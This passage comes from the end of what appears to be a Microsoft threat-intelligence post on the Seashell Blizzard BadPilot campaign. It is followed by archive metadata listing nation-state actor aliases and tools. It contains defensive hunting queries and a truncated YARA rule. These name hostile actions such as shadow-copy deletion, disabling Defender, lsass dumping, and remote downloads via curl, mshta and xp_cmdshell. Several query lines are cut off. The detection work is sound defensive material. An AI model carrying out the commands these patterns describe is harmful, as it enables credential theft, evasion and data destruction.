commands.\r\nDeviceProcessEvents\r\n | where InitiatingProcessParentFileName endswith \"ScreenConnect.ClientService.exe\"\r\n | where (FileName in~ (\"powershell.exe\", \"powershell_ise.exe\", \"cmd.exe\") and\r\n ProcessCommandLine has_any (\"System.DirectoryServices.ActiveDirectory.Domain\", \"hidden -e\r\n or (FileName =~ \"mshta.exe\" and ProcessCommandLine contains \"http\")\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 17 of 19\n\nor (FileName =~ \"curl.exe\" and ProcessCommandLine contains \"http\")\r\n or ProcessCommandLine has_all (\"powershell\", \"-command\", \"curl\")\r\n or ProcessCommandLine has_any (\"E:jscript\", \"e:vbscript\", \"start msiexec /q /i\")\r\n or ProcessCommandLine has_all (\"reg add\", \"DisableAntiSpyware\", @\"\\Microsoft\\Windows Defen\r\n or ProcessCommandLine has_all (\"reg add\", \"DisableRestrictedAdmin\", @\"CurrentControlSet\\Co\r\n or ProcessCommandLine has_all (\"vssadmin\", \"delete\", \"shadows\")\r\n or ProcessCommandLine has_all (\"vssadmin\", \"list\", \"shadows\")\r\n or ProcessCommandLine has_all (\"wmic\", \"process call create\")\r\n or ProcessCommandLine has_all (\"wmic\", \"delete\", \"shadowcopy\")\r\n or ProcessCommandLine has_all (\"wmic\", \"shadowcopy\", \"call create\")\r\n or ProcessCommandLine has_all (\"wbadmin\", \"delete\", \"catalog\")\r\n or ProcessCommandLine has_all (\"ntdsutil\", \"create full\")\r\n or (ProcessCommandLine has_all (\"schtasks\", \"/create\") and not(ProcessCommandLine has \"shu\r\n or (ProcessCommandLine has \"nltest\" and ProcessCommandLine has_any (\"domain_trusts\", \"dcli\r\n or (ProcessCommandLine has \"lsass\" and ProcessCommandLine has_any (\"procdump\", \"tasklist\"\r\n or FileName in~ (\"tasklist.exe\", \"ssh.exe\", \"icacls.exe\", \"certutil.exe\", \"calc.exe\", \"bit\r\n \"winrm.exe\", \"dsquery.exe\", \"makecab.exe\", \"hh.exe\", \"pcalua.ex\r\n \"cmstp.exe\", \"esentutl.exe\", \"dnscmd.exe\", \"gpscript.exe\", \"msd\r\n | where not(ProcessCommandLine has_any (\"servicedesk.atera.com\", \"support.csolve.net\", \"lt.tech-ke\r\nFortiClient EMS log capture\r\nIf you believe your FortiClient has been exploited before patching, this query may help with further investigation.\r\nAccording to Horizon3 research, the C:\\Program Files (x86)\\Fortinet\\FortiClientEMS\\logs log file can be\r\nexamined to identify malicious activity. Run the following query to surface devices with this log file for further\r\ninvestigation. \r\nDeviceFileEvents\r\n| where FileName contains @\"C:\\Program Files (x86)\\Fortinet\\FortiClientEMS\\logs\"\r\n| distinct DeviceName\r\nAdditionally, Horizon3 noted that this SQL vulnerability could allow for remote code execution (RCE) using\r\nthe xp_cmdshell functionality of Microsoft SQL Server. The SQL logs can also be examined for evidence\r\nof xp_cmdshell being leveraged to spawn a Windows command shell.\r\nAccording to Microsoft research, the following query could help surface exploitation activity related to this\r\nvulnerability. \r\nDeviceProcessEvents\r\n| where InitiatingProcessFileName == \"sqlservr.exe\"\r\n| where FileName =~ \"cmd.exe\"\r\n| where ProcessCommandLine has_any (\"webclient\", \"downloadstring\", \"http\", \"https\", \"downloadfile\")\r\n| where InitiatingProcessCommandLine has_all (\"sqlservr.exe\", \"-sFCEMS\")\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 18 of 19\n\nTor service\r\nFind services associated with Tor. \r\nDeviceEvents\r\n| where ActionType == 'ServiceInstalled'\r\n| extend JSON = parse_json(AdditionalFields)\r\n| where JSON.ServiceName has 'tor'\r\nYARA rule\r\nUse the following Yara rule to find malicious JavaScript inserted into OWA sign-in pages.   \r\nrule injected_cred_logger_owa {\r\nstrings:\r\n$owa = \"\r\nSource: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-glo\r\nbal-access-operation/?ref=thestack.technology\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology" ], "report_names": [ "?ref=thestack.technology" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434716, "ts_updated_at": 1775826785, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/614ba46c4d82bf61c82ae27fc13348aa15b87319.pdf", "text": "https://archive.orkl.eu/614ba46c4d82bf61c82ae27fc13348aa15b87319.txt", "img": "https://archive.orkl.eu/614ba46c4d82bf61c82ae27fc13348aa15b87319.jpg" } }